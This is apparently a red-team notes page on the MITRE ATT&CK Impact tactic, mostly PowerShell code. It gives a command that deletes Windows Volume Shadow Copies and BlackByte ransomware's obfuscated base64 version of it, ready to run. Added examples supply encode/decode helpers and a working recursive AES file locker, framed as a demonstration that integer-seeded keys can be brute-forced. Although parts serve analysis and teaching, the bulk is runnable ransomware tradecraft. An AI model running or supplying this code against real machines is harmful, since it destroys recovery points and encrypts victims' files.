burmat / nathan burchfield
Impact

The adversary is trying to manipulate, interrupt, or destroy your systems and data. https://attack.mitre.org/tactics/TA0040/


Remove Volume Shadow Copies

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

This TTP (MITRE ATT&CK T1490, Inhibit System Recovery) is associated with BlackByte ransomware, which runs the same command as a base64-encoded UTF-16LE string, split into concatenated fragments and decoded at runtime:

powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x
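Added example (not from the original page and not part of the BlackByte sample): a pair of helpers that produce the UTF-16LE/base64 form the one-liner above decodes, and reverse it so a captured blob can be read offline during triage. The function names are this example's own; the blob it decodes is the one from the sample above.

```powershell
# Added example, not from the original page: build the UTF-16LE/base64 form that the
# BlackByte one-liner above decodes, and reverse it for analysis. Function names are
# this example's own.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # "Unicode" in .NET means UTF-16LE, the encoding both the sample above and
    # powershell.exe -EncodedCommand expect
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Blob)
    # Drop whitespace, quotes and '+' so a blob copied straight out of a
    # concatenated PowerShell expression (as in the sample) decodes cleanly
    $clean = $Blob -replace '[\s''"+]', ''
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($clean))
}

$cmd = 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}'

# The concatenated blob from the BlackByte sample above, pasted as-is
$captured = "'RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+" +
            "'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='"

$decoded = ConvertFrom-EncodedCommand $captured
if ($decoded -ne $cmd) { throw "blob did not decode to the shadow copy deletion command" }
$decoded

# Round trip: re-encoding gives one contiguous blob in the form -EncodedCommand takes
$reencoded = ConvertTo-EncodedCommand $cmd
if ((ConvertFrom-EncodedCommand $reencoded) -ne $cmd) { throw "round trip failed" }
$reencoded
```

The fragment splitting in the sample only defeats naive string matching on the blob; once the pieces are joined, the decode is a single line. Note that Get-WmiObject exists only in Windows PowerShell; on PowerShell 7 the read-only equivalent for checking what shadow copies are present is Get-CimInstance Win32_ShadowCopy.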

PowerShell Encryption Routine

A trivial example of encrypting files recursively with AES, using a random integer as the key:

https://github.com/burmat/burmatscripts/blob/master/powershell/AES-Locker.ps1
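Added example, not burmat's AES-Locker.ps1 and not based on its source: a self-contained AES-256-CBC file locker keyed on one random integer, the matching unlock side, and a brute force that recovers the integer from a ciphertext and a guessed plaintext prefix. The seed-to-key derivation (SHA-256 over the decimal seed) and every function name here are this example's assumptions; the demo runs on constructed sample files in a scratch directory and leaves originals in place.

```powershell
# Added example, not burmat's AES-Locker.ps1 and not based on its source: an AES-256-CBC
# file locker keyed on one random integer, the matching unlock side, and a brute force
# that recovers the integer from ciphertext alone. The seed-to-key derivation (SHA-256
# over the decimal seed) is this example's assumption; all names here are its own.

function Get-KeyFromSeed {
    param([Parameter(Mandatory)][int]$Seed)
    $sha = [System.Security.Cryptography.SHA256]::Create()
    try     { $sha.ComputeHash([System.Text.Encoding]::ASCII.GetBytes([string]$Seed)) }   # 32 bytes -> AES-256 key
    finally { $sha.Dispose() }
}

function Protect-Bytes {
    param([Parameter(Mandatory)][byte[]]$Plain, [Parameter(Mandatory)][byte[]]$Key)
    $aes = [System.Security.Cryptography.Aes]::Create()      # CBC + PKCS7 by default
    try {
        $aes.Key = $Key
        $aes.GenerateIV()                                    # fresh IV per file, stored in front of the ciphertext
        $cipher = $aes.CreateEncryptor().TransformFinalBlock($Plain, 0, $Plain.Length)
        return [byte[]]($aes.IV + $cipher)
    } finally { $aes.Dispose() }
}

function Unprotect-Bytes {
    param([Parameter(Mandatory)][byte[]]$Blob, [Parameter(Mandatory)][byte[]]$Key)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key = $Key
        $aes.IV  = [byte[]]($Blob[0..15])
        return $aes.CreateDecryptor().TransformFinalBlock($Blob, 16, $Blob.Length - 16)
    } finally { $aes.Dispose() }
}

function Lock-Tree {
    param([Parameter(Mandatory)][string]$Root, [Parameter(Mandatory)][int]$Seed)
    $key = Get-KeyFromSeed $Seed
    # Recursive walk, files only. Non-destructive here: a real locker deletes the original.
    Get-ChildItem -Path $Root -Recurse -File |
        Where-Object { $_.Extension -notin '.locked', '.restored' } |
        ForEach-Object {
            $blob = Protect-Bytes -Plain ([System.IO.File]::ReadAllBytes($_.FullName)) -Key $key
            [System.IO.File]::WriteAllBytes("$($_.FullName).locked", [byte[]]$blob)
        }
}

function Unlock-Tree {
    param([Parameter(Mandatory)][string]$Root, [Parameter(Mandatory)][int]$Seed)
    $key = Get-KeyFromSeed $Seed
    Get-ChildItem -Path $Root -Recurse -File -Filter '*.locked' | ForEach-Object {
        $plain = Unprotect-Bytes -Blob ([System.IO.File]::ReadAllBytes($_.FullName)) -Key $key
        $out   = $_.FullName -replace '\.locked$', '.restored'
        [System.IO.File]::WriteAllBytes($out, [byte[]]$plain)
    }
}

function Find-Seed {
    # Known-plaintext scan over the seed space: a wrong key almost always fails PKCS7
    # padding, and the few that pass are rejected by the prefix comparison.
    param([Parameter(Mandatory)][byte[]]$Blob, [Parameter(Mandatory)][byte[]]$KnownPrefix, [Parameter(Mandatory)][int]$Max)
    for ($s = 0; $s -lt $Max; $s++) {
        try {
            $plain = [byte[]](Unprotect-Bytes -Blob $Blob -Key (Get-KeyFromSeed $s))
            if ($plain.Length -ge $KnownPrefix.Length -and
                [System.BitConverter]::ToString($plain, 0, $KnownPrefix.Length) -eq [System.BitConverter]::ToString($KnownPrefix)) {
                return $s
            }
        } catch [System.Security.Cryptography.CryptographicException] { }   # bad padding = wrong key
    }
    return $null
}

# Demo on a scratch directory with constructed sample files; nothing outside it is touched
$root = Join-Path ([System.IO.Path]::GetTempPath()) ("locker-demo-" + [guid]::NewGuid())
New-Item -ItemType Directory -Path (Join-Path $root 'sub') -Force | Out-Null
Set-Content -Path (Join-Path $root 'a.txt') -Value 'constructed sample file A'
Set-Content -Path (Join-Path (Join-Path $root 'sub') 'b.txt') -Value 'constructed sample file B'

$seed = Get-Random -Maximum 5000    # demo range; a bare Get-Random spans 0..[int]::MaxValue
Lock-Tree   -Root $root -Seed $seed
Unlock-Tree -Root $root -Seed $seed
Get-Content (Join-Path $root 'a.txt.restored')

# Recovery with ciphertext plus a guessed prefix only, no seed: feasible because the
# key space is the integer range, not 2^256
$blob  = [System.IO.File]::ReadAllBytes((Join-Path $root 'a.txt.locked'))
$found = Find-Seed -Blob $blob -KnownPrefix ([System.Text.Encoding]::ASCII.GetBytes('constructed')) -Max 5000
"seed used: $seed, seed recovered: $found"
```

The point of Find-Seed is the caveat a practitioner wants next to any "random integer as the key" routine: AES-256 is only as strong as the entropy behind the key, and a key derived from a 32-bit integer leaves at most 2^31 candidates, which is a brute force in native code rather than a cryptographic problem. The demo scans a reduced range so it finishes in seconds in PowerShell; the search is the same at full range, just longer.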